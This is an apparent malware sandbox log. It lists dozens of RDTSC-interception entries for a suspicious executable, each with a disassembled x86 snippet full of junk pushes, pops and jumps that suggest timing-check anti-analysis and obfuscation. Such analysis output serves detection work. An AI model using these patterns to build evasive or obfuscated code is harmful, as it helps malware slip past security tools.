Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660D76 second address: 7660D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7F4B4AE82h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660D94 second address: 7660DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 51h 0x00000005 pushfd 0x00000006 jmp 00007FC7F4EE1C4Ah 0x0000000b sub ax, 15D8h 0x00000010 jmp 00007FC7F4EE1C4Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a jmp 00007FC7F4EE1C56h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660DD6 second address: 7660DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660DF2 second address: 7660E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7F4EE1C51h 0x00000008 pushfd 0x00000009 jmp 00007FC7F4EE1C50h 0x0000000e and ecx, 5C7604F8h 0x00000014 jmp 00007FC7F4EE1C4Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660E33 second address: 7660E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660E37 second address: 7660E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660E3D second address: 7660EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov al, 0Ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-18h] 0x0000000d pushad 0x0000000e jmp 00007FC7F4B4AE7Dh 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC7F4B4AE88h 0x0000001c and cx, B0E8h 0x00000021 jmp 00007FC7F4B4AE7Bh 0x00000026 popfd 0x00000027 mov eax, 6A1820DFh 0x0000002c popad 0x0000002d mov dword ptr [esp], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC7F4B4AE81h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660EA1 second address: 7660EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660EA7 second address: 7660EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660EAB second address: 7660EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660ECC second address: 7660ED9 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov ax, 07A7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660ED9 second address: 7660F3E instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edi, eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC7F4EE1C54h 0x00000010 and esi, 1586F808h 0x00000016 jmp 00007FC7F4EE1C4Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC7F4EE1C58h 0x00000022 sub eax, 31FF1A68h 0x00000028 jmp 00007FC7F4EE1C4Bh 0x0000002d popfd 0x0000002e popad 0x0000002f test edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660F3E second address: 7660F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660F42 second address: 7660F48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660F48 second address: 7660F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC8637295CFh 0x0000000f pushad 0x00000010 mov ecx, 389E429Dh 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 mov eax, dword ptr [ebp-14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FC7F4B4AE81h 0x00000024 pop esi 0x00000025 movsx edi, si 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660F82 second address: 7660FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ah, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, esi 0x0000000c pushad 0x0000000d mov di, si 0x00000010 jmp 00007FC7F4EE1C56h 0x00000015 popad 0x00000016 mov dword ptr [esi+0Ch], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC7F4EE1C57h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660FC5 second address: 7660FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660FCB second address: 7660FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660FCF second address: 7660FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7660FD3 second address: 7661047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, 762C06ECh 0x0000000d jmp 00007FC7F4EE1C57h 0x00000012 sub eax, eax 0x00000014 jmp 00007FC7F4EE1C4Fh 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC7F4EE1C57h 0x00000026 sbb ax, CDEEh 0x0000002b jmp 00007FC7F4EE1C59h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661047 second address: 7661057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661057 second address: 766106C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7F4EE1C4Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766106C second address: 766107E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766107E second address: 76610BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FC7F4EE1C57h 0x0000000f jne 00007FC863AC0283h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC7F4EE1C55h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76610BC second address: 76610C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 32EBB722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76610C6 second address: 76611A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC7F4EE1C55h 0x00000011 adc cl, FFFFFFF6h 0x00000014 jmp 00007FC7F4EE1C51h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007FC7F4EE1C50h 0x00000020 sub esi, 12914A18h 0x00000026 jmp 00007FC7F4EE1C4Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov eax, dword ptr [esi] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FC7F4EE1C54h 0x00000036 and si, B478h 0x0000003b jmp 00007FC7F4EE1C4Bh 0x00000040 popfd 0x00000041 call 00007FC7F4EE1C58h 0x00000046 call 00007FC7F4EE1C52h 0x0000004b pop eax 0x0000004c pop edx 0x0000004d popad 0x0000004e mov dword ptr [edx], eax 0x00000050 pushad 0x00000051 mov esi, 2BDC1123h 0x00000056 mov ch, 9Ch 0x00000058 popad 0x00000059 mov eax, dword ptr [esi+04h] 0x0000005c jmp 00007FC7F4EE1C4Bh 0x00000061 mov dword ptr [edx+04h], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FC7F4EE1C55h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76611A9 second address: 76611AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76611AE second address: 76611C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 0B80BDB0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ax, CF47h 0x00000016 push esi 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76611C7 second address: 7661226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC7F4B4AE7Ch 0x00000013 add ax, 1858h 0x00000018 jmp 00007FC7F4B4AE7Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 mov bx, cx 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov eax, edx 0x0000002e jmp 00007FC7F4B4AE7Fh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661226 second address: 766122C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766122C second address: 7661230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661230 second address: 7661258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7F4EE1C59h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661258 second address: 766125C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766125C second address: 7661262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661262 second address: 7661268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661268 second address: 766126C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766126C second address: 7661270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661270 second address: 76612E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f pushfd 0x00000010 jmp 00007FC7F4EE1C4Dh 0x00000015 and al, 00000066h 0x00000018 jmp 00007FC7F4EE1C51h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [edx+10h], eax 0x00000022 jmp 00007FC7F4EE1C4Eh 0x00000027 mov eax, dword ptr [esi+14h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FC7F4EE1C4Dh 0x00000033 or ax, 6976h 0x00000038 jmp 00007FC7F4EE1C51h 0x0000003d popfd 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76612E1 second address: 76612E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76612E6 second address: 766133B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 67h 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+14h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC7F4EE1C4Eh 0x00000014 sub ah, FFFFFFC8h 0x00000017 jmp 00007FC7F4EE1C4Bh 0x0000001c popfd 0x0000001d mov bl, cl 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+18h] 0x00000023 jmp 00007FC7F4EE1C4Bh 0x00000028 mov dword ptr [edx+18h], eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e call 00007FC7F4EE1C51h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766133B second address: 7661361 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 16BE2504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+1Ch] 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007FC7F4B4AE81h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661361 second address: 76613FE instructions: 0x00000000 rdtsc 0x00000002 call 00007FC7F4EE1C51h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC7F4EE1C4Dh 0x00000015 jmp 00007FC7F4EE1C4Bh 0x0000001a popfd 0x0000001b call 00007FC7F4EE1C58h 0x00000020 pushfd 0x00000021 jmp 00007FC7F4EE1C52h 0x00000026 or eax, 58BAD1A8h 0x0000002c jmp 00007FC7F4EE1C4Bh 0x00000031 popfd 0x00000032 pop ecx 0x00000033 popad 0x00000034 mov eax, dword ptr [esi+20h] 0x00000037 jmp 00007FC7F4EE1C4Fh 0x0000003c mov dword ptr [edx+20h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FC7F4EE1C50h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76613FE second address: 766140D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766140D second address: 7661467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ah, 05h 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 jmp 00007FC7F4EE1C4Dh 0x00000019 mov eax, dword ptr [esi+28h] 0x0000001c pushad 0x0000001d jmp 00007FC7F4EE1C4Ch 0x00000022 push ecx 0x00000023 mov ecx, edi 0x00000025 pop ebx 0x00000026 popad 0x00000027 mov dword ptr [edx+28h], eax 0x0000002a jmp 00007FC7F4EE1C58h 0x0000002f mov ecx, dword ptr [esi+2Ch] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661467 second address: 7661484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661484 second address: 76614A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+2Ch], ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC7F4EE1C4Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76614A3 second address: 76614B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76614B2 second address: 766151D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC7F4EE1C4Ch 0x00000014 or ch, FFFFFFA8h 0x00000017 jmp 00007FC7F4EE1C4Bh 0x0000001c popfd 0x0000001d mov ch, 8Fh 0x0000001f popad 0x00000020 mov word ptr [edx+30h], ax 0x00000024 jmp 00007FC7F4EE1C4Bh 0x00000029 mov ax, word ptr [esi+32h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC7F4EE1C55h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766151D second address: 7661525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661525 second address: 7661542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov word ptr [edx+32h], ax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7F4EE1C4Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661542 second address: 7661546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661546 second address: 766154C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766154C second address: 766156C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 53E70BE0h 0x00000014 mov ch, bl 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766156C second address: 76615B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7F4EE1C51h 0x00000009 or cx, 74E6h 0x0000000e jmp 00007FC7F4EE1C51h 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+34h], eax 0x0000001c jmp 00007FC7F4EE1C4Ah 0x00000021 test ecx, 00000700h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76615B5 second address: 76615F1 instructions: 0x00000000 rdtsc 0x00000002 mov ah, ECh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7F4B4AE7Fh 0x0000000b popad 0x0000000c jne 00007FC863728FC2h 0x00000012 jmp 00007FC7F4B4AE86h 0x00000017 or dword ptr [edx+38h], FFFFFFFFh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76615F1 second address: 766160E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 766160E second address: 7661655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC7F4B4AE87h 0x00000008 pop ecx 0x00000009 mov edi, 620F2BECh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, F133h 0x0000001c jmp 00007FC7F4B4AE88h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661655 second address: 7661672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, edi 0x00000012 mov dx, 85B2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661672 second address: 7661678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 7661678 second address: 766167C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76B0C80 second address: 76B0C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76B0C84 second address: 76B0C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76507F2 second address: 76507F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76507F8 second address: 76507FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 76507FC second address: 765084A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC7F4B4AE7Eh 0x00000013 sbb eax, 4C5580E8h 0x00000019 jmp 00007FC7F4B4AE7Bh 0x0000001e popfd 0x0000001f mov ah, 30h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, eax 0x00000029 mov si, 0FCFh 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 765084A second address: 7650850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F07D5 second address: 75F07D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F07D9 second address: 75F07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F07DF second address: 75F07F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 75F07F0 second address: 75F07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
